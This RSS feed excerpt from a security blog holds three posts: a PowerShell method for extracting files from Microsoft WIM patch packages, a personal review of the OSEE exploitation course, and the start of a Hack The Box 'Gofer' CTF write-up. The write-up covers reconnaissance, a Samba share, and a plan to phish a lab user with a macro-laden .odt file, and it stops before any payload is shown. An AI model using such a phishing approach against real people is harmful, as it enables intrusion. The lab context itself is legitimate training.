&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;struct metadata_resource{
    _SECURITYBLOCK_DISK security_data;
    _DIRENTRY entries[(WIM Header.rhOffsetTable.liOriginalSize/
        sizeof(_RESHDR_DISK))];   
};
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h2 id=&quot;parsing-the-metadata&quot;&gt;Parsing the Metadata&lt;/h2&gt;
&lt;p&gt;Now that we have both the Lookup Table and the Metadata resource, we can piece back together the files packaged in the WIM file.&lt;/p&gt;

&lt;p&gt;The Metadata resource is made up of Security Data and Directory Entries. The Security Data is not always populated, particularly in patch files: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dwTotalLength&lt;/code&gt; gives the block’s size, and if it is only 8 the block holds nothing beyond its two header fields.&lt;/p&gt;

&lt;p&gt;Let’s take a look at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;boot_metadata&lt;/code&gt; -&amp;gt; &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;entries&lt;/code&gt;. The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dwAttributes&lt;/code&gt; variable corresponds to the &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants&quot;&gt;File Attribute Constants&lt;/a&gt;. The first entry is flagged as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FILE_ATTRIBUTE_DIRECTORY&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/entry1v2.png&quot; alt=&quot;direntry&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This entry is the root directory, the folder that contains the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.cab&lt;/code&gt; files. Since we’re only interested in the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.cab&lt;/code&gt; files, we can skip it.&lt;/p&gt;

&lt;p&gt;The next entries are of more interest:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/entry 2 pt1.PNG&quot; alt=&quot;entry2pt1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;This record is flagged as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FILE_ATTRIBUTE_ARCHIVE&lt;/code&gt; and has the name “&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;DesktopDeployment.cab&lt;/code&gt;”.&lt;/p&gt;

&lt;p&gt;Since it’s only metadata of the file, we’ll need to look up the offset and size using the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bHash&lt;/code&gt;:&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/entry 2 pt2.PNG&quot; alt=&quot;entry2pt2&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bHash&lt;/code&gt; is a byte array which equals to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;89E96B37CC2EE5E6017FF2AB03E399133C65C002&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Aren’t the entries in the Metadata and the Lookup Table in the same order? Unfortunately not, which is why lookups are performed. If we take the hash and match it against the records in the Lookup Table, we find the offset and size at index 1 of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;FileResources&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/resource2v2.png&quot; alt=&quot;resource1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;So we can confirm the file is located right after the header, just as depicted in the WIM structure. &lt;strong&gt;We can also see the file is uncompressed.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/dd.PNG&quot; alt=&quot;dd&quot; /&gt;&lt;/p&gt;

&lt;h1 id=&quot;putting-it-all-together&quot;&gt;Putting it all together&lt;/h1&gt;
&lt;p&gt;We learned how the WIM format works, how to find the files inside a WIM and, most importantly, how Microsoft ships their patches: uncompressed. This is probably for performance reasons. Patch files are enormous, up to a few GB, and while compression saves space, decompressing while applying a patch would drive up CPU and RAM usage; the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.cab&lt;/code&gt; payloads are already compressed anyway, so a second layer would save little. That, on top of &lt;a href=&quot;https://learn.microsoft.com/en-us/windows/deployment/update/forward-reverse-differentials&quot;&gt;unpacking the Patch Storage File (PSF)&lt;/a&gt;, would not make for a satisfactory experience.&lt;/p&gt;

&lt;p&gt;How can we use this information? Now that we know how the format works, we can just retrieve the files using scripts. I wrote two scripts, one in &lt;a href=&quot;https://github.com/basicinfosecurity/misc/blob/master/WIM/wim.ps1&quot;&gt;powershell&lt;/a&gt; and another in &lt;a href=&quot;https://github.com/basicinfosecurity/misc/blob/master/WIM/wim.py&quot;&gt;python&lt;/a&gt;.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;...
class BaseClass{
    $size
    $offset
}

# RESHDR_DISK_SHORT as used in the header: 7-byte size, flag byte, 8-byte offset
class ResourceHeader : BaseClass{
    ResourceHeader($stream, $readOffset){
        $data = Read $stream $readOffset 0x16
        $this.size = ReadSize $data[0..6]
        $this.offset = ReadValue $data[8..15]
    }
}

class MetaData{
    # 102 is the minimum size of the struct, see
    # https://github.com/ebiggers/wimlib/blob/master/include/wimlib/dentry.h#L17
    $metadataEntryStructSz = 0x66
    $length
    $CreationTime
    $LastAccessTime
    $LastWriteTime
    $SHA1
    $FileName
    MetaData($stream, $readOffset){
        $data = Read $stream $readOffset $this.metadataEntryStructSz

        # Parse metadata record entry,
        # first record is the root record which can be skipped
        $this.length = ReadSize $data[0..7]
        $this.CreationTime = ReadValue $data[40..47]
        $this.LastAccessTime = ReadValue $data[48..55]
        $this.LastWriteTime = ReadValue $data[56..63]
        $this.SHA1 = ReadHexString $data[64..83]
        # wFileNameLength is a byte count; the UTF-16 name follows the fixed part
        $fileNameLength = ReadSize $data[100..101]
        $this.FileName = ConvertWideChar $(Read $stream ($readOffset
            + $this.metadataEntryStructSz) $fileNameLength)
    }
}

# RESHDR_DISK: 24-byte short header, part number, ref count, then the 20-byte SHA1 at 30..49
class Resource : BaseClass{
    $SHA1
    Resource($stream, $readOffset){
        $data = Read $stream $readOffset 0x32
        $this.size = ReadSize $data[16..23]   # liOriginalSize, equal to the stored size when uncompressed
        $this.offset = ReadValue $data[8..15]
        $this.SHA1 = ReadHexString $data[30..49]
    }
}
...
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We create classes modeled after the structs we explored earlier. Then we navigate the file and read these resources to recreate the activity earlier.&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;...
$resourceHeaders = @{
    rhOffsetTableHeader = $null
    rhXmlDataHeader = $null
    rhBootMetadataHeader = $null
}

$startIndex = 0
$resourceStructSz = 0x32 # 50

# Get resource files
$resourceHeaders[&quot;rhOffsetTableHeader&quot;] = [ResourceHeader]::new($fs, 0x30)
log_s &quot;Offset table at $(&quot;0x{0:x}&quot; -f $resourceHeaders[&quot;rhOffsetTableHeader&quot;].offset)&quot;

# Get XML Data
$resourceHeaders[&quot;rhXmlDataHeader&quot;] = [ResourceHeader]::new($fs, 0x48)
$xmlData = BytesToString $(Read $fs $resourceHeaders[&quot;rhXmlDataHeader&quot;].offset $resourceHeaders[&quot;rhXmlDataHeader&quot;].size)
log_s &quot;XML data at $(&quot;0x{0:x}&quot; -f $resourceHeaders[&quot;rhXmlDataHeader&quot;].offset)&quot;

# Get Metadata if available
$resourceHeaders[&quot;rhBootMetadataHeader&quot;] = [ResourceHeader]::new($fs, 0x60)
if($resourceHeaders[&quot;rhBootMetadataHeader&quot;].offset){
    log_s &quot;Boot metadata at $(&quot;0x{0:x}&quot; -f $resourceHeaders[&quot;rhBootMetadataHeader&quot;].offset)&quot;
}
else{
    log_i &quot;Metadata not included in WIM File. Checking Resource files for metadata.&quot;
    $resourceHeaders[&quot;rhBootMetadataHeader&quot;] = [ResourceHeader]::new($fs, $resourceHeaders[&quot;rhOffsetTableHeader&quot;].offset)
    $startIndex = 1
}

$securityDataSz = ReadSize $(Read $fs $resourceHeaders[&quot;rhBootMetadataHeader&quot;].offset 4)

if($securityDataSz -le 8){
    log_i &quot;No boot metadata found. Using the first resource in the offset table.&quot;
    # Skip the empty 8-byte security block, the 104-byte root directory entry and the
    # 8-byte end-of-listing marker (0x78 in total) to reach the first child entry; the
    # root entry's liSubdirOffset should hold this same value and is the general way to find it
    $resourceHeaders[&quot;rhBootMetadataHeader&quot;].offset += 0x78
}
...
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Once we find the Lookup Table and Metadata, we start collecting the file offsets, sizes and timestamps and write the files from the stream to an output directory. Since the files are uncompressed, we avoided implementing any compression algorithm or reliance on third party tools.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/script1v2.png&quot; alt=&quot;script1&quot; /&gt;&lt;/p&gt;

&lt;p&gt;To check that we pulled the files out correctly, we compare their SHA1 hashes by hand and observe that they match the hashes recorded in the WIM file exactly.&lt;/p&gt;

&lt;p&gt;With some benchmarking, we observe the script is even faster than 7zip:&lt;/p&gt;
&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Measure-Command {&amp;amp; &quot;C:\Program Files\7-Zip\7z.exe&quot; x .\wim.msu -o7ztest}

Days              : 0
Hours             : 0
Minutes           : 0
Seconds           : 1
Milliseconds      : 726
Ticks             : 17260436
TotalDays         : 1.99773564814815E-05
TotalHours        : 0.000479456555555556
TotalMinutes      : 0.0287673933333333
TotalSeconds      : 1.7260436
TotalMilliseconds : 1726.0436
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Measure-Command {.\wim.ps1 -Wim .\wim.msu -Destination wimtest}
[+] Magic bytes match WIM signature
[+] WIM File is not compressed
[*] GUID: 35C3305ECFA83CE22B673A79518C202A
[+] Offset table at 0x30a2d304
[+] XML data at 0x30a2d494
[*] Metadata not included in WIM File. Checking Resource files for metadata.
[*] No boot metadata found. Using the first resource in the offset table.
[+] Found file: DesktopDeployment.cab [89E96B37CC2EE5E6017FF2AB03E399133C65C002]
[+] Found file: DesktopDeployment_x86.cab [0884E45A1E35D453368C0E6A730317122E92A10F]
[+] Found file: SSU-26100.3764-x64.cab [2D4713681EA1FB66172EB2DDB1F6BED5D447664B]
[+] Found file: Windows11.0-KB5055523-x64.psf [A343EE70DB22870629EE0BD9F4672D1EF047F077]
[+] Found file: Windows11.0-KB5055523-x64.wim [4C698B7BA1F2F690130D6220EAA998CECD9CCE00]
[+] Found file: onepackage.AggregatedMetadata.cab [757FB964F02D464DC6D9BFE4DDDE161F67DA6C27]
[+] Found file: wsusscan.cab [AA2799D8FC05E1CF64E8E4F0CC517F7FEF62EDAD]

Days              : 0
Hours             : 0
Minutes           : 0
Seconds           : 0
Milliseconds      : 760
Ticks             : 7603211
TotalDays         : 8.80001273148148E-06
TotalHours        : 0.000211200305555556
TotalMinutes      : 0.0126720183333333
TotalSeconds      : 0.7603211
TotalMilliseconds : 760.3211
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;It’s probably not a fair comparison, as 7zip is a far more general tool, but for our use case this is a nice improvement.&lt;/p&gt;

&lt;h1 id=&quot;coming-full-circle&quot;&gt;Coming Full Circle&lt;/h1&gt;
&lt;p&gt;I wanted to add this functionality to PatchExtract.ps1 and the more I worked on it, the more I found myself rewriting the original script. The product of this rewrite is &lt;a href=&quot;https://github.com/basicinfosecurity/misc/blob/master/WIM/Expand-Patch.ps1&quot;&gt;Expand-Patch.ps1&lt;/a&gt;.
It should behave similarly to the original, just with the WIM parsing and some optimizations. The bulk of sorting now occurs during the unpacking of the PSF. I also fixed parsing of the PSF manifest data to occur at the &lt;a href=&quot;https://gist.github.com/wumb0/306f97dc8376c6f53b9f9865f60b4fb5?permalink_comment_id=5417945#gistcomment-5417945&quot;&gt;proper offset&lt;/a&gt;. The repo can be found &lt;a href=&quot;https://github.com/basicinfosecurity/misc/tree/master/WIM&quot;&gt;here&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/wim/expand patch 1.PNG&quot; alt=&quot;script2&quot; /&gt;&lt;/p&gt;

&lt;p&gt;I would be grateful if people can check it out and let me know what they think of it. Thanks to Greg Linares (&lt;a href=&quot;https://twitter.com/Laughing_Mantis/&quot;&gt;@Laughing_Mantis&lt;/a&gt;) and &lt;a href=&quot;https://wumb0.in/&quot;&gt;wumb0&lt;/a&gt; for providing these scripts to researchers. Thanks also to &lt;a href=&quot;https://github.com/ebiggers/wimlib&quot;&gt;wimlib&lt;/a&gt; which pointed the way whenever I got lost.&lt;/p&gt;

&lt;div class=&quot;footnotes&quot; role=&quot;doc-endnotes&quot;&gt;
  &lt;ol&gt;
    &lt;li id=&quot;fn:1&quot; role=&quot;doc-endnote&quot;&gt;
      &lt;p&gt;Microsoft, Windows Imaging File Format (WIM) (2007), p. 4 &lt;a href=&quot;#fnref:1&quot; class=&quot;reversefootnote&quot; role=&quot;doc-backlink&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
    &lt;/li&gt;
    &lt;li id=&quot;fn:2&quot; role=&quot;doc-endnote&quot;&gt;
      &lt;p&gt;https://www.reddit.com/r/techsupport/comments/1ij7e77/can_expandexe_still_extract_the_content_of_an_msu/ &lt;a href=&quot;#fnref:2&quot; class=&quot;reversefootnote&quot; role=&quot;doc-backlink&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
    &lt;/li&gt;
    &lt;li id=&quot;fn:3&quot; role=&quot;doc-endnote&quot;&gt;
      &lt;p&gt;https://gist.github.com/wumb0/306f97dc8376c6f53b9f9865f60b4fb5#file-patchextract-ps1-L159 &lt;a href=&quot;#fnref:3&quot; class=&quot;reversefootnote&quot; role=&quot;doc-backlink&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
    &lt;/li&gt;
    &lt;li id=&quot;fn:4&quot; role=&quot;doc-endnote&quot;&gt;
      &lt;p&gt;Microsoft, Windows Imaging File Format (WIM) (2007), p. 5 &lt;a href=&quot;#fnref:4&quot; class=&quot;reversefootnote&quot; role=&quot;doc-backlink&quot;&gt;&amp;#8617;&lt;/a&gt;&lt;/p&gt;
    &lt;/li&gt;
  &lt;/ol&gt;
&lt;/div&gt;
</description>
        
        
        <pubDate>Mon, 20 Oct 2025 00:00:00 +0000</pubDate>
        <link>https://basicinfosecurity.github.io//blog/At-the-WIM-of-Microsoft/</link>
        <guid isPermaLink="true">https://basicinfosecurity.github.io//blog/At-the-WIM-of-Microsoft/</guid>
        
        
      </item>
      
    
      
      <item>
        <title>OSEE and Me</title>
        <description>&lt;p&gt;&lt;em&gt;This is the final post in the “OSXX and Me” series. Check out the rest:&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;em&gt;&lt;a href=&quot;/blog/OSCP-and-Me/&quot;&gt;OSCP and Me&lt;/a&gt;&lt;/em&gt;&lt;/li&gt;
  &lt;li&gt;&lt;em&gt;&lt;a href=&quot;/blog/OSCE-and-Me/&quot;&gt;OSCE and Me&lt;/a&gt;&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h1 id=&quot;prelude&quot;&gt;Prelude&lt;/h1&gt;
&lt;p&gt;It was May 2019. Having claimed the now outdated OSCE, I set my sights on OSEE. A direct path proved to be elusive. Offsec used to offer AWE/EXP-401 training at Blackhat Asia. It was last offered during the &lt;a href=&quot;https://www.blackhat.com/asia-19/training/schedule/&quot;&gt;2019 iteration&lt;/a&gt; in April. Options were now limited to expensive trips outside Singapore, usually for BH Las Vegas or Europe. As much as I wanted to go, it was financially prohibitive. I hoped for the day it would return, and that I would have change to spare for it.&lt;/p&gt;

&lt;p&gt;Then the pandemic hit.&lt;/p&gt;

&lt;p&gt;Around 2020, Corelan offered its &lt;a href=&quot;https://www.corelan-training.com/index.php/training/heap/&quot;&gt;trainings&lt;/a&gt; in Singapore. I thought it was a great way to learn Windows exploitation if EXP-401 never returned. The raging virus ravaged the world, delaying the training to 2023.&lt;/p&gt;

&lt;p&gt;In late 2023, early bird promos for EXP-401 were announced, to my surprise! Even for an early bird slot, the price was almost triple that of BH Asia (perhaps the ticket sales were used to pay the rest of the training costs?). It was hard to pass up.&lt;/p&gt;

&lt;h1 id=&quot;interlude&quot;&gt;Interlude&lt;/h1&gt;
&lt;h2 id=&quot;training-week&quot;&gt;Training Week&lt;/h2&gt;
&lt;p&gt;Training was held in late May 2024 at a nice hotel. I swear putrefied slush streamed from my ears. The food was nice and consoling though.&lt;/p&gt;

&lt;p&gt;Nights were spent on exercises. My skill level was inadequate to take on any extra miles. There were students who claimed challenge coins even though they just received the handbook. Having completed all the extra miles by myself, I can say there are students who &lt;em&gt;really really&lt;/em&gt; wanted those coins. The instructors also gave out stickers for completing exercises from the text book. I may not have claimed any coins but I was happy to get a sticker.&lt;/p&gt;

&lt;h2 id=&quot;training-months&quot;&gt;Training Months&lt;/h2&gt;
&lt;p&gt;The rest of 2024 was devoted to studying the tome of a text book. During bootcamp, I was up from evening to morning trying to catch up, showing up dazed and hardly attentive for class. Imagine stumbling and divining your way through a cave, and into a circuitous network of keyholes. Outside the bootcamp setting, I was able to rest and to pace myself accordingly. These contributed greatly to my improvement and to my morale. The extra miles, the true exercises of the course, were once thought impossible. Steady progress was made on each until all of them were completed. I enjoyed Browser Exploitation the most and VMWare exploitation the least, for the former had targets that were easy to debug and the latter the most tedious to manage and rebuild.&lt;/p&gt;

&lt;h2 id=&quot;first-attempt&quot;&gt;First Attempt&lt;/h2&gt;
&lt;p&gt;I booked the exam for November as I wanted to claim the certification before EOY. There were some clues to the challenges in the exam report but prep time was scarce.&lt;/p&gt;

&lt;p&gt;On exam day, I assumed the most difficult challenge was the one most unfamiliar to me. I went straight for the second challenge. It was a grave mistake. By the end of the third day, I only solved the second challenge and did not complete the first. Even though it only amounted to half of the requirements, I still wrote the report. The next day, the failure result came but not for an incomplete report. It turns out I failed to upload the report properly. My mind was mushed soup, barely contained by the bowl I called a head.&lt;/p&gt;

&lt;h2 id=&quot;second-attempt&quot;&gt;Second attempt&lt;/h2&gt;
&lt;p&gt;I took the exam again in January. Having already done the second, I poured my efforts into the first. Perhaps in any walk of life, good recon will net the necessary edge to overcome any situation. Most of the time was consumed in RE, to cover more ground than my previous attempt. The solution I came up with was unconventional; I was unsure if it was the intended solution. Hacking is a pragmatic science, I suppose? Despite having doubts, the exploit worked and fulfilled the necessary objectives. To salve my conscience, I made sure to use the remaining time collecting data and screenshots and prepping the report. After rest on the fourth day, I wrote and submitted the report the morning after and reported in for work. And yes, this time I was able to upload the report properly.&lt;/p&gt;

&lt;h1 id=&quot;postlude&quot;&gt;Postlude&lt;/h1&gt;
&lt;p&gt;The course is a newer version of AWE, the materials updated and released back in 2023 to my knowledge. I have no reference point as this is my first time taking it, but I can finally say I now have some idea what a primitive means. It’s such a vague term for me; pinning down what it exactly means is as elusive as its etymology. &lt;a href=&quot;https://youtu.be/PY9fNJel-X8?t=225&quot;&gt;zardus&lt;/a&gt; formulates it in the most digestible form I’ve found. Anyway, the materials were a joy to study on their own. Having said this, it still shows its age in some parts even though it was refreshed. Corrections to the labs reported by students are missing from the materials. They enable the conditions for the exploits to work properly, instead of making the extra miles easier. I’m unsure why they are yet to be added.&lt;/p&gt;

&lt;p&gt;I’m also unsure if the steep price is proportional to the value of the service you’re getting. This course is unlike any other in Offsec’s catalog: no videos, no recordings. You get a text book, PoC code and VMs for practice. Purchasing the course and viewing exam results are unavailable in the student portal. I can understand the former but the latter? Not so much. This is my latest, and probably my last, Offsec course so I was pleasantly surprised the exam results are now shared to students. The pleasantness faded as soon as I discovered AWE is yet to receive the same treatment.&lt;/p&gt;

&lt;h2 id=&quot;when-try-harder-is-not-enough&quot;&gt;When “Try Harder” is not enough&lt;/h2&gt;
&lt;p&gt;The instructors, while they constructed and provided excellent material, were unresponsive to inquiries. At the end of the bootcamp they gave out their contact details. From the emails I sent, only the first one received a reply. I would have appreciated hearing from and interacting with them. There is also a private discord channel for students and instructors; it’s often too quiet. You’re lucky to get a reply.&lt;/p&gt;

&lt;p&gt;From a student.&lt;/p&gt;

&lt;p&gt;This is problematic as students have no obligation to help. Perhaps it’s par for the course. After all, this is Offsec.&lt;/p&gt;

&lt;p&gt;The result is given out &lt;a href=&quot;https://help.offsec.com/hc/en-us/articles/360046458732-EXP-401-Advanced-Windows-Exploitation-OSEE-Exam-Guide#results&quot;&gt;within ten business days&lt;/a&gt;. It seems there are two types of vocal students: those who get their result in 24 hours and those waiting out the 10 days, if not more. Those who wait 3-6 days or a week might have no gripes. The unenviably unlucky ones endure 10 or more days. Unable to act or plan immediately, they are forced into stasis. Ten days might seem fair, but considering the total time investment makes it unpalatable. For AWE, the exam is 4 days. Adding the waiting period, 2 weeks. Imagine a student receiving a failing result after investing 2 weeks, and potentially another 2 weeks for the retake.&lt;/p&gt;

&lt;p&gt;That’s a month.&lt;/p&gt;

&lt;p&gt;The total hikes up further if we consider slot availability. After all, it’s not always easy to line up &lt;em&gt;4 back to back, open days&lt;/em&gt;. Students will probably forgo other plans. They can’t simply &lt;em&gt;“try harder”&lt;/em&gt; their way out. This might happen to the unluckiest of students but I think there are students who can strongly relate. For my second attempt the result came after 10 business days. With the exam the ordeal was 18 calendar days. It is difficult for me to write about this as part of me thinks &lt;em&gt;“It’s okay to be patient and to wait”&lt;/em&gt;. Part of me also thinks &lt;em&gt;“Is it unreasonable of me to feel so uneasy with the amount of time and money invested in this?”&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;The &lt;a href=&quot;https://www.offsec.com/awe/EXP401_syllabus.pdf&quot;&gt;current syllabus&lt;/a&gt; is at odds with the &lt;a href=&quot;https://www.credential.net/group/360702&quot;&gt;credentials description&lt;/a&gt;:
&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/credentials 1.PNG&quot; alt=&quot;creds&quot; /&gt;&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;Preventing ASLR was not tackled in the course. The course placed focus on obtaining info leaks and converting them into useful primitives.&lt;/li&gt;
  &lt;li&gt;EMET is long gone as of this writing. It was used as supplementary material for &lt;a href=&quot;https://www.microsoft.com/en-us/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/&quot;&gt;WDEG&lt;/a&gt; but not a focal point.&lt;/li&gt;
  &lt;li&gt;We mostly used 64-bit.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Probably for the sake of previous holders, Offsec kept the same details for newer holders. It’s a shame since newer holders will have to contend with displaying an outdated version of their achievement. An OSEE/OSEE+ split might be unconscionable; simply thinking about it gives me shivers.&lt;/p&gt;

&lt;p&gt;Offsec has been around for a while, so they must receive similar feedback in some form or another. If not, I hope they consider this post in improving the learning experience of their students. Despite the remonstrances, I am thankful to them for creating wonderful courses and for helping me advance my career. There’s still a lot to learn. Thanks to Offsec, I may be able to go the distance with newfound skills and experience. If ever I am interested in any of their new content I will check them out. Though I cannot take nor recommend them without reluctance.&lt;/p&gt;

&lt;h2 id=&quot;whats-next&quot;&gt;What’s Next?&lt;/h2&gt;
&lt;p&gt;My backlog is swelling and there are some things I’ve been wanting to post for some time now. I’ll come out with technical content to make up for the lack in this post. As for certs, I have some pushed aside so I’ll continue pursuing them. Thanks for visiting my blog. Please look out for more posts.&lt;/p&gt;

</description>
        
        
        <pubDate>Fri, 21 Feb 2025 00:00:00 +0000</pubDate>
        <link>https://basicinfosecurity.github.io//blog/OSEE-and-Me/</link>
        <guid isPermaLink="true">https://basicinfosecurity.github.io//blog/OSEE-and-Me/</guid>
        
        
      </item>
      
    
      
      <item>
        <title>HTB Gofer</title>
        <description>&lt;h3 id=&quot;intro&quot;&gt;Intro&lt;/h3&gt;
&lt;p&gt;Hey. It’s been a while. Here’s a post. Trying to mix things up a bit with a ctf writeup. It’s heavy on screenshots and if you notice any anachronisms it’s because the screenshots are from the future. Just kidding. I went back and forth to get more for illustration.&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/Gofer.png&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;recon&quot;&gt;Recon&lt;/h3&gt;
&lt;p&gt;Let’s start with a simple scan:&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/nmap.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;First, we can see port 80, which is associated with the domain name &lt;em&gt;gofer.htb&lt;/em&gt;. Let’s put that in our &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/etc/hosts&lt;/code&gt; file later. Second, Samba is also available, noticeably with a version vulnerable to SambaCry. Looks like low-hanging fruit and I did make an attempt just to make sure. As this is a “Hard” box, doors won’t easily open. Finally, there’s port 25, which is filtered, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ssh&lt;/code&gt;, which will come into play later on.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/gofer_site.png&quot; /&gt;&lt;/p&gt;
&lt;p&gt;As is usual for HTB fare, it’s a webapp. It’s quite minimal, which tells us we don’t need to spend much time gawking at its design. I did go through any functionality that might be of interest. There’s the map and the message box. But the message box was broken (i.e. no target for the form action), and I already know where I am.&lt;/p&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/the team.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;There’s info about the fictional employees though. That will come in handy later on.&lt;/p&gt;

&lt;h4 id=&quot;samba&quot;&gt;Samba&lt;/h4&gt;
&lt;p&gt;What’s in the smb shares? Well there’s a folder named &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;shares&lt;/code&gt;. Quite prosaic.&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/samba1.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/samba2.png&quot; /&gt;&lt;/p&gt;

&lt;p&gt;Some mail is backed up. Going through it, we’ll find the setup for this challenge:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;From jdavis@gofer.htb  Fri Oct 28 20:29:30 2022
Return-Path: &amp;lt;jdavis@gofer.htb&amp;gt;
X-Original-To: tbuckley@gofer.htb
Delivered-To: tbuckley@gofer.htb
Received: from gofer.htb (localhost [127.0.0.1])
        by gofer.htb (Postfix) with SMTP id C8F7461827
        for &amp;lt;tbuckley@gofer.htb&amp;gt;; Fri, 28 Oct 2022 20:28:43 +0100 (BST)
Subject:Important to read!
Message-Id: &amp;lt;20221028192857.C8F7461827@gofer.htb&amp;gt;
Date: Fri, 28 Oct 2022 20:28:43 +0100 (BST)
From: jdavis@gofer.htb

Hello guys,

Our dear Jocelyn received another phishing attempt last week and his 
habit of clicking on links without paying much attention may be 
problematic one day. That&apos;s why from now on, I&apos;ve decided that 
important documents will only be sent internally, by mail, which 
should greatly limit the risks. If possible, use an .odt format, 
as documents saved in Office Word are not always well interpreted 
by Libreoffice.

PS: Last thing for Tom; I know you&apos;re working on our web proxy 
but if you could restrict access, it will be more secure until 
you have finished it. It seems to me that it should be possible 
to do so via &amp;lt;Limit&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p align=&quot;center&quot;&gt;&lt;img src=&quot;https://basicinfosecurity.github.io//assets/img/htb/gofer/jocelyn.png&quot; /&gt;&lt;/p&gt;
&lt;p align=&quot;center&quot;&gt;&lt;em&gt;A security threat.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Seems like someone is skipping their cyber awareness training. She (or he?) will lend us a helping hand gaining a foothold. Let’s craft that &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.odt&lt;/code&gt; document!&lt;/p&gt;

&lt;h3 id=&quot;odt-macros&quot;&gt;ODT Macros&lt;/h3&gt;
&lt;p&gt;There are guides like &lt;a href=&quot;https://dominicbreuker.com/post/htb_re/&quot; target=&quot;_blank&quot;&gt;this&lt;/a&gt; one and &lt;a href=&quot;https://wiki.openoffice.org/wiki/Documentation/OOoAuthors_User_Manual/Getting_Started/Creating_a_simple_macro&quot; target=&quot;_blank&quot;&gt;this&lt;/a&gt; one for this part.&lt;/p&gt;
